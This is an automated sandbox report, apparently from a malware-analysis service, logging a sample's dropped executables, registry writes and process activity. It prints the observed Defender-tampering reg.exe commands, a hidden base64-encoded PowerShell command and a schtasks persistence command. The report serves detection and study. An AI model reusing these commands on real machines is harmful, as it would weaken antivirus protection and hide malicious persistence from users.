Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zS3361.tmpJump to behavior
Source: classification engineClassification label: mal80.evad.winEXE@97/15@0/0
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeMutant created: \BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5948:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2264:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5600:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: file.exeStatic file information: File size 7631904 > 1048576

Data Obfuscation

barindex
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411360 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413954 push eax; ret
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413CC0 push eax; ret
Source: file.exeStatic PE information: section name: .sxdata
Source: Install.exe.0.drStatic PE information: section name: .sxdata
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Persistence and Installation Behavior

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeFile created: C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\avEZCOa.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeFile created: C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\avEZCOa.exeJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Windows\Tasks\bGZpGlqvDNKjraWjlZ.jobJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
